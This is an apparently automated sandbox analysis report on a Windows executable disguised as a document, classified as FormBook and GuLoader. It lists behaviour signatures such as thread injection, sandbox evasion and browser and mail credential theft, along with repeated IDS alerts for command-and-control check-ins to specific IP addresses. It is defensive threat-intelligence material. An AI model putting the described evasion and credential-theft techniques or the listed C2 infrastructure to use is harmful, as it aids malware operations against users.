Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Document_084462.scr.exe

Overview

General Information

Sample name:Document_084462.scr.exe
Analysis ID:1567687
MD5:b4e362177a0e0836dd04831fe456255b
SHA1:de7a47519e45386fd0b0f2ff4ab6fbdb5b81716e
SHA256:0ccf347c204f022f6cf118c653ccb248e41cfc71593217b9ed5bfc7ef13fcbc7
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Switches to a custom stack to bypass stack traces
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • Document_084462.scr.exe (PID: 1684 cmdline: "C:\Users\user\Desktop\Document_084462.scr.exe" MD5: B4E362177A0E0836DD04831FE456255B)
    • Document_084462.scr.exe (PID: 3396 cmdline: "C:\Users\user\Desktop\Document_084462.scr.exe" MD5: B4E362177A0E0836DD04831FE456255B)
      • RAVCpl64.exe (PID: 7608 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • waitfor.exe (PID: 8112 cmdline: "C:\Windows\SysWOW64\waitfor.exe" MD5: E58E152B44F20DD099C5105DE482DF24)
          • firefox.exe (PID: 6276 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.16927455279.00000000048A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.13274732696.0000000000150000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.16927359269.0000000004850000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000001.00000002.13274829512.00000000067E0000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000000.00000002.12951622773.0000000009B40000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-03T18:54:21.165696+010028032702Potentially Bad Traffic192.168.11.2049748122.201.127.17443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-03T18:54:55.670483+010028554651A Network Trojan was detected192.168.11.2049749202.92.5.2380TCP
            2024-12-03T18:55:19.257391+010028554651A Network Trojan was detected192.168.11.204975313.248.169.4880TCP
            2024-12-03T18:55:33.005769+010028554651A Network Trojan was detected192.168.11.2049757209.74.77.10980TCP
            2024-12-03T18:55:47.811594+010028554651A Network Trojan was detected192.168.11.204976123.225.159.4280TCP
            2024-12-03T18:56:02.000340+010028554651A Network Trojan was detected192.168.11.204976546.30.211.3880TCP
            2024-12-03T18:56:15.996802+010028554651A Network Trojan was detected192.168.11.2049769103.224.182.24280TCP
            2024-12-03T18:56:31.244538+010028554651A Network Trojan was detected192.168.11.2049773149.88.81.19080TCP
            2024-12-03T18:56:46.253918+010028554651A Network Trojan was detected192.168.11.2049777101.35.209.18380TCP
            2024-12-03T18:57:01.088425+010028554651A Network Trojan was detected192.168.11.204978138.47.232.20280TCP
            2024-12-03T18:57:16.592863+010028554651A Network Trojan was detected192.168.11.2049785208.91.197.3980TCP
            2024-12-03T18:57:31.221665+010028554651A Network Trojan was detected192.168.11.204978943.205.198.2980TCP
            2024-12-03T18:57:45.450379+010028554651A Network Trojan was detected192.168.11.2049793172.67.187.11480TCP
            2024-12-03T18:57:59.221096+010028554651A Network Trojan was detected192.168.11.2049797104.21.57.24880TCP
            2024-12-03T18:58:13.120261+010028554651A Network Trojan was detected192.168.11.204980174.48.143.8280TCP
            2024-12-03T18:58:27.649504+010028554651A Network Trojan was detected192.168.11.2049805134.0.14.15880TCP
            2024-12-03T18:58:44.822680+010028554651A Network Trojan was detected192.168.11.2049806202.92.5.2380TCP
            2024-12-03T18:58:58.206606+010028554651A Network Trojan was detected192.168.11.204981013.248.169.4880TCP
            2024-12-03T18:59:11.753182+010028554651A Network Trojan was detected192.168.11.2049814209.74.77.10980TCP
            2024-12-03T18:59:25.482700+010028554651A Network Trojan was detected192.168.11.204981823.225.159.4280TCP
            2024-12-03T18:59:39.298041+010028554651A Network Trojan was detected192.168.11.204982246.30.211.3880TCP
            2024-12-03T18:59:52.856997+010028554651A Network Trojan was detected192.168.11.2049826103.224.182.24280TCP
            2024-12-03T19:00:07.185737+010028554651A Network Trojan was detected192.168.11.2049830149.88.81.19080TCP
            2024-12-03T19:00:21.476589+010028554651A Network Trojan was detected192.168.11.2049834101.35.209.18380TCP
            2024-12-03T19:00:35.826457+010028554651A Network Trojan was detected192.168.11.204983838.47.232.20280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-03T18:53:21.836127+010028554641A Network Trojan was detected192.168.11.2049784208.91.197.3980TCP
            2024-12-03T18:53:21.836127+010028554641A Network Trojan was detected192.168.11.204980913.248.169.4880TCP
            2024-12-03T18:53:21.836127+010028554641A Network Trojan was detected192.168.11.2049782208.91.197.3980TCP
            2024-12-03T18:53:21.836127+010028554641A Network Trojan was detected192.168.11.204975213.248.169.4880TCP
            2024-12-03T18:53:21.836127+010028554641A Network Trojan was detected192.168.11.2049783208.91.197.3980TCP
            2024-12-03T18:55:11.191718+010028554641A Network Trojan was detected192.168.11.204975013.248.169.4880TCP
            2024-12-03T18:55:13.870410+010028554641A Network Trojan was detected192.168.11.204975113.248.169.4880TCP
            2024-12-03T18:55:24.857076+010028554641A Network Trojan was detected192.168.11.2049754209.74.77.10980TCP
            2024-12-03T18:55:27.571982+010028554641A Network Trojan was detected192.168.11.2049755209.74.77.10980TCP
            2024-12-03T18:55:30.291099+010028554641A Network Trojan was detected192.168.11.2049756209.74.77.10980TCP
            2024-12-03T18:55:39.662480+010028554641A Network Trojan was detected192.168.11.204975823.225.159.4280TCP
            2024-12-03T18:55:42.376534+010028554641A Network Trojan was detected192.168.11.204975923.225.159.4280TCP
            2024-12-03T18:55:45.089734+010028554641A Network Trojan was detected192.168.11.204976023.225.159.4280TCP
            2024-12-03T18:55:53.682677+010028554641A Network Trojan was detected192.168.11.204976246.30.211.3880TCP
            2024-12-03T18:55:56.455161+010028554641A Network Trojan was detected192.168.11.204976346.30.211.3880TCP
            2024-12-03T18:55:59.251794+010028554641A Network Trojan was detected192.168.11.204976446.30.211.3880TCP
            2024-12-03T18:56:07.844275+010028554641A Network Trojan was detected192.168.11.2049766103.224.182.24280TCP
            2024-12-03T18:56:10.568828+010028554641A Network Trojan was detected192.168.11.2049767103.224.182.24280TCP
            2024-12-03T18:56:13.278283+010028554641A Network Trojan was detected192.168.11.2049768103.224.182.24280TCP
            2024-12-03T18:56:22.625733+010028554641A Network Trojan was detected192.168.11.2049770149.88.81.19080TCP
            2024-12-03T18:56:25.510004+010028554641A Network Trojan was detected192.168.11.2049771149.88.81.19080TCP
            2024-12-03T18:56:28.381371+010028554641A Network Trojan was detected192.168.11.2049772149.88.81.19080TCP
            2024-12-03T18:56:37.627041+010028554641A Network Trojan was detected192.168.11.2049774101.35.209.18380TCP
            2024-12-03T18:56:40.509997+010028554641A Network Trojan was detected192.168.11.2049775101.35.209.18380TCP
            2024-12-03T18:56:43.383184+010028554641A Network Trojan was detected192.168.11.2049776101.35.209.18380TCP
            2024-12-03T18:56:52.441476+010028554641A Network Trojan was detected192.168.11.204977838.47.232.20280TCP
            2024-12-03T18:56:55.327382+010028554641A Network Trojan was detected192.168.11.204977938.47.232.20280TCP
            2024-12-03T18:56:58.207171+010028554641A Network Trojan was detected192.168.11.204978038.47.232.20280TCP
            2024-12-03T18:57:22.567725+010028554641A Network Trojan was detected192.168.11.204978643.205.198.2980TCP
            2024-12-03T18:57:25.456160+010028554641A Network Trojan was detected192.168.11.204978743.205.198.2980TCP
            2024-12-03T18:57:28.330391+010028554641A Network Trojan was detected192.168.11.204978843.205.198.2980TCP
            2024-12-03T18:57:37.500189+010028554641A Network Trojan was detected192.168.11.2049790172.67.187.11480TCP
            2024-12-03T18:57:40.298583+010028554641A Network Trojan was detected192.168.11.2049791172.67.187.11480TCP
            2024-12-03T18:57:42.724317+010028554641A Network Trojan was detected192.168.11.2049792172.67.187.11480TCP
            2024-12-03T18:57:51.285622+010028554641A Network Trojan was detected192.168.11.2049794104.21.57.24880TCP
            2024-12-03T18:57:53.924561+010028554641A Network Trojan was detected192.168.11.2049795104.21.57.24880TCP
            2024-12-03T18:57:56.613863+010028554641A Network Trojan was detected192.168.11.2049796104.21.57.24880TCP
            2024-12-03T18:58:04.994520+010028554641A Network Trojan was detected192.168.11.204979874.48.143.8280TCP
            2024-12-03T18:58:07.692391+010028554641A Network Trojan was detected192.168.11.204979974.48.143.8280TCP
            2024-12-03T18:58:10.401521+010028554641A Network Trojan was detected192.168.11.204980074.48.143.8280TCP
            2024-12-03T18:58:19.413589+010028554641A Network Trojan was detected192.168.11.2049802134.0.14.15880TCP
            2024-12-03T18:58:22.145021+010028554641A Network Trojan was detected192.168.11.2049803134.0.14.15880TCP
            2024-12-03T18:58:24.919629+010028554641A Network Trojan was detected192.168.11.2049804134.0.14.15880TCP
            2024-12-03T18:58:50.141283+010028554641A Network Trojan was detected192.168.11.204980713.248.169.4880TCP
            2024-12-03T18:58:52.821550+010028554641A Network Trojan was detected192.168.11.204980813.248.169.4880TCP
            2024-12-03T18:59:03.599772+010028554641A Network Trojan was detected192.168.11.2049811209.74.77.10980TCP
            2024-12-03T18:59:06.317034+010028554641A Network Trojan was detected192.168.11.2049812209.74.77.10980TCP
            2024-12-03T18:59:09.041640+010028554641A Network Trojan was detected192.168.11.2049813209.74.77.10980TCP
            2024-12-03T18:59:17.325482+010028554641A Network Trojan was detected192.168.11.204981523.225.159.4280TCP
            2024-12-03T18:59:20.046254+010028554641A Network Trojan was detected192.168.11.204981623.225.159.4280TCP
            2024-12-03T18:59:22.765576+010028554641A Network Trojan was detected192.168.11.204981723.225.159.4280TCP
            2024-12-03T18:59:30.998158+010028554641A Network Trojan was detected192.168.11.204981946.30.211.3880TCP
            2024-12-03T18:59:33.749854+010028554641A Network Trojan was detected192.168.11.204982046.30.211.3880TCP
            2024-12-03T18:59:36.548323+010028554641A Network Trojan was detected192.168.11.204982146.30.211.3880TCP
            2024-12-03T18:59:44.713906+010028554641A Network Trojan was detected192.168.11.2049823103.224.182.24280TCP
            2024-12-03T18:59:47.417194+010028554641A Network Trojan was detected192.168.11.2049824103.224.182.24280TCP
            2024-12-03T18:59:50.135369+010028554641A Network Trojan was detected192.168.11.2049825103.224.182.24280TCP
            2024-12-03T18:59:58.551125+010028554641A Network Trojan was detected192.168.11.2049827149.88.81.19080TCP
            2024-12-03T19:00:01.416649+010028554641A Network Trojan was detected192.168.11.2049828149.88.81.19080TCP
            2024-12-03T19:00:04.296824+010028554641A Network Trojan was detected192.168.11.2049829149.88.81.19080TCP
            2024-12-03T19:00:12.886351+010028554641A Network Trojan was detected192.168.11.2049831101.35.209.18380TCP
            2024-12-03T19:00:15.740889+010028554641A Network Trojan was detected192.168.11.2049832101.35.209.18380TCP
            2024-12-03T19:00:18.603530+010028554641A Network Trojan was detected192.168.11.2049833101.35.209.18380TCP
            2024-12-03T19:00:27.215292+010028554641A Network Trojan was detected192.168.11.204983538.47.232.20280TCP
            2024-12-03T19:00:30.112224+010028554641A Network Trojan was detected192.168.11.204983638.47.232.20280TCP
            2024-12-03T19:00:32.958544+010028554641A Network Trojan was detected192.168.11.204983738.47.232.20280TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: Document_084462.scr.exeReversingLabs: Detection: 34%
            Yara detected FormBook
            Source: Yara matchFile source: 00000003.00000002.16927455279.00000000048A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.13274732696.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.16927359269.0000000004850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Machine Learning detection for sample
            Source: Document_084462.scr.exeJoe Sandbox ML: detected
            Source: Document_084462.scr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 122.201.127.17:443 -> 192.168.11.20:49748 version: TLS 1.2
            Source: Document_084462.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: waitfor.pdbGCTL source: Document_084462.scr.exe, 00000001.00000002.13294981161.000000000776D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: waitfor.pdb source: Document_084462.scr.exe, 00000001.00000002.13294981161.000000000776D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Document_084462.scr.exe, 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Document_084462.scr.exe, Document_084462.scr.exe, 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 0_2_0040674C FindFirstFileW,FindClose,0_2_0040674C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 0_2_00405B00 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405B00
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 4x nop then mov ebx, 00000004h1_2_001204CE
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4x nop then mov ebx, 00000004h2_2_034E34CE
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4x nop then mov ebx, 00000004h3_2_04D904CE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49763 -> 46.30.211.38:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49749 -> 202.92.5.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49775 -> 101.35.209.183:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49785 -> 208.91.197.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49766 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49791 -> 172.67.187.114:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49758 -> 23.225.159.42:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49786 -> 43.205.198.29:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49812 -> 209.74.77.109:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49754 -> 209.74.77.109:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49755 -> 209.74.77.109:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49774 -> 101.35.209.183:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49765 -> 46.30.211.38:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49830 -> 149.88.81.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49762 -> 46.30.211.38:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49834 -> 101.35.209.183:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49770 -> 149.88.81.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49773 -> 149.88.81.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49759 -> 23.225.159.42:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49789 -> 43.205.198.29:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49781 -> 38.47.232.202:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49778 -> 38.47.232.202:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49761 -> 23.225.159.42:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49767 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49795 -> 104.21.57.248:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49771 -> 149.88.81.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49772 -> 149.88.81.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49833 -> 101.35.209.183:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49817 -> 23.225.159.42:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49792 -> 172.67.187.114:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49824 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49793 -> 172.67.187.114:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49768 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49780 -> 38.47.232.202:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49769 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49760 -> 23.225.159.42:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49801 -> 74.48.143.82:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49777 -> 101.35.209.183:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49798 -> 74.48.143.82:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49790 -> 172.67.187.114:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49806 -> 202.92.5.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49794 -> 104.21.57.248:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49753 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49750 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49751 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49808 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49804 -> 134.0.14.158:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49815 -> 23.225.159.42:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49820 -> 46.30.211.38:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49835 -> 38.47.232.202:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49756 -> 209.74.77.109:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49757 -> 209.74.77.109:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49799 -> 74.48.143.82:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49776 -> 101.35.209.183:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49836 -> 38.47.232.202:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49803 -> 134.0.14.158:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49838 -> 38.47.232.202:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49814 -> 209.74.77.109:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49787 -> 43.205.198.29:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49816 -> 23.225.159.42:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49811 -> 209.74.77.109:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49818 -> 23.225.159.42:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49788 -> 43.205.198.29:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49819 -> 46.30.211.38:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49837 -> 38.47.232.202:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49822 -> 46.30.211.38:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49825 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49832 -> 101.35.209.183:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49831 -> 101.35.209.183:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49796 -> 104.21.57.248:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49800 -> 74.48.143.82:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49764 -> 46.30.211.38:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49797 -> 104.21.57.248:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49779 -> 38.47.232.202:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49821 -> 46.30.211.38:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49805 -> 134.0.14.158:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49823 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49827 -> 149.88.81.190:80
